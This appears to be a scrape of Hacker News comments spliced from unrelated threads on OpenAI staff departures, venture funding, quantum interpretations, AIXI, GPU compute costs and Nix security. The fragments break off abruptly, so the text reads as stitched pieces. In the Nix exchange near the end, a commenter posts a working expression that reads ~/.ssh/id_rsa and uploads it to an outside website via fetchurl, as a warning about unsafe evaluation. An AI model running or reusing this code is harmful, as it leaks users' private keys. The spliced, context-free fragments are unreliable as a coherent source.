An hour and a half later, when we finished this talk, I looked at my friend and told her, “I’m taking back every single word that I said to Ilya.”
He freaked the hell out of people there. And we’re talking about AI professionals who work in the biggest AI labs in the Bay Area. They were leaving the room, saying, “Holy shit.”
The snapshots above cannot capture the lengthy discussion. The point is that Ilya Sutskever took what you see in the media, the “AGI utopia vs. potential apocalypse” ideology, to the next level. It was traumatizing. [0]
[0] What Ilya Sutskever Really Wants https://www.aipanic.news/p/what-ilya-sutskever-really-wants
Lol no. There is roughly $500B in VC dollars still floating around, not to mention $1.2T in buyout dry powder, and the venture funds being raised continue to grow YoY.
https://www.bain.com/globalassets/noindex/2024/bain_report_g...
https://www.ftc.gov/news-events/news/press-releases/2024/04/...
After this change they will have only one.
But if it were related, then that would presumably be because people within the company (or at least two rather noteworthy people) no longer believe that OpenAI is acting in the best interests of humanity.
Which isn't too shocking really given that a decent chunk of us feel the same way, but then again, we're just nobodies making dumb comments on Hacker News. It's a little different when someone like Ilya really doesn't want to be at OpenAI.
mirror: https://ghostarchive.org/varchive/7nORLckDnmg (1m 15s)
In fact, his arguments against nonlocality were experimentally refuted in the '80s, when Bell-test experiments confirmed correlations that no local hidden-variable theory can reproduce [0].
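For concreteness, the CHSH form of Bell's inequality is the standard worked example: any local hidden-variable theory keeps the correlation sum at or below 2, while quantum mechanics predicts values up to 2√2, and the Aspect experiments measured the violation.

\[ S = E(a,b) - E(a,b') + E(a',b) + E(a',b'), \qquad |S|_{\mathrm{LHV}} \le 2 < 2\sqrt{2} = |S|_{\mathrm{QM}}^{\max} \]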
I don't think anyone _likes_ the Copenhagen interpretation per se, it's just the least objectionable choice (if you have to make one at all). Many-worlds sounds cool and all until you realize that it's essentially impossible to verify experimentally, and at that point you're discussing philosophy and what-if more than physics.
Intuition only gets you as far as the accuracy of your mental model. Is it intuitive that the volume enclosed by the unit hypersphere approaches zero [1] as its dimension goes to infinity? Or that photons have momentum, but no mass? Or that you can draw higher-dimensional Venn diagrams with sectors that have negative area? If these all make intuitive sense to you, I'm jealous that your intuition extends further than mine.
[1] https://en.wikipedia.org/wiki/Volume_of_an_n-ball
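The closed form makes the hypersphere limit clear: the Gamma function in the denominator eventually dominates any power of π, so

\[ V_n = \frac{\pi^{n/2}}{\Gamma\!\left(\frac{n}{2}+1\right)} \;\longrightarrow\; 0 \quad \text{as } n \to \infty. \]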
1. Alan Turing on why we should never ever perform a Turing test: https://redirect.cs.umbc.edu/courses/471/papers/turing.pdf
2. Marvin Minsky on the “Frame Problem” that led to one or two previous AI winters, and what an intuitive algorithm might look like: https://ojs.aaai.org/aimagazine/index.php/aimagazine/article...
Unclear how to value the equity I gave up, but it was probably at least 85% of my family's net worth.
Basically I wanted to retain my ability to criticize the company in the future.
> but "stop working on your field of research" isn't going to happen.
We’re talking about an NDA; obviously non-competes aren’t legal in CA.
https://www.lesswrong.com/posts/kovCotfpTFWFXaxwi/?commentId...
That won't happen; the next scam will be different.
It was crypto until FTX collapsed; then the usual suspects, led by a16z, leaned on OpenAI to rush whatever they had to market, hence the odd naming of ChatGPT 3.5.
When the hype is finally realized to be just mass printing bullshit -- relevant bullshit, yes, which sometimes can be useful but not billions of dollars of useful -- there will be something else.
Same old, same old. The only difference is there are no new catchy tunes. Yet? https://youtu.be/I6IQ_FOCE6I https://locusmag.com/2023/12/commentary-cory-doctorow-what-k...
Here is Leike's paper, coauthored with Hutter:
https://arxiv.org/abs/1510.04931
They can probably sum it up in their own paper better than I can, but AIXI was supposed to be a formalized, objective model of rationality. They knew from the start that it was uncomputable, but I think they hoped to use it as a sort of gold standard that you could approach.
But then it turned out that the choice of Turing machine, which can be (mostly) ignored for Kolmogorov complexity, cannot be ignored in AIXI at all.
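For reference, the invariance theorem is what makes the machine choice "(mostly)" ignorable for Kolmogorov complexity: switching the universal machine from V to U changes complexities by at most an additive constant that is independent of the string,

\[ K_U(x) \le K_V(x) + c_{U,V} \quad \text{for all } x, \]

whereas no analogous string-independent bound protects AIXI, whose behavior can depend on the choice of universal prior in essential ways.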
This round of AI is only capable of producing bullshit. Relevant bullshit, but bullshit. This can be useful (https://hachyderm.io/@inthehands/112006855076082650), but it doesn't mean it's more impactful than the Internet.
Geohot (https://geohot.github.io/blog/) estimates that a human-brain equivalent requires 20 PFLOPS. Current top-of-the-line GPUs deliver around 2 PFLOPS and consume up to 500 W. Scaling that linearly means ten GPUs drawing 5 kW in total, which translates to approximately 3 EUR per hour if I calculate correctly.
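Spelled out as a quick sanity check (a sketch; the comment doesn't state an electricity price, so the 0.60 EUR/kWh below is my assumption, chosen because it makes the 3 EUR figure come out):

  # Back-of-the-envelope check of the numbers above. All inputs are the
  # comment's estimates except EUR_PER_KWH, which is an assumed electricity price.
  BRAIN_PFLOPS = 20      # geohot's human-brain estimate
  GPU_PFLOPS = 2         # one top-of-the-line GPU
  GPU_WATTS = 500        # power draw per GPU
  EUR_PER_KWH = 0.60     # assumption; substitute your local price

  gpus = BRAIN_PFLOPS / GPU_PFLOPS       # 10 GPUs
  power_kw = gpus * GPU_WATTS / 1000     # 5 kW
  eur_per_hour = power_kw * EUR_PER_KWH  # 3.0 EUR/hour
  print(f"{gpus:.0f} GPUs, {power_kw:.0f} kW, {eur_per_hour:.2f} EUR/hour")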
In that comment, you wrote:
> It can delete your home directory or email your ssh private keys to Zimbabwe.
I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):
let
  # The pinned nixpkgs is imported only for lib.escapeURL; the leak itself needs only builtins.
  pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
in
# Reads ~/.ssh/id_rsa at evaluation time and exfiltrates it as a URL query string.
builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"
It does not need --impure or any other unusual switches to work. Hope this helps.
Also, it doesn't work:
error: access to absolute path '/home/user/.ssh/id_rsa' is forbidden in restricted mode
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous. https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Hope this helps.
I don't think it did. I'm not sure what it was supposed to help with.
Ah, I over-quoted that part. My mistake.
> Also, it doesn't work:
It will work with the default Nix settings.
> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.
One would need to first turn it on to be able to turn it off.
> https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Indeed, note the default value.
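For anyone reproducing both sides of this exchange: with stock settings the expression above evaluates, performing the fetchurl; with the option turned on you get the restricted-mode error quoted earlier. A sketch, where leak.nix is a hypothetical file containing that expression:

  # default settings (restrict-eval is false): evaluates and leaks the key
  nix-instantiate --eval leak.nix
  # with restriction on: "access to absolute path ... is forbidden in restricted mode"
  nix-instantiate --eval --option restrict-eval true leak.nix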
> I don't think it did. I'm not sure what it was supposed to help with.
I was hoping that it would be interesting to you, and also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But I think I understand now that maybe you don't care about what happens to other people.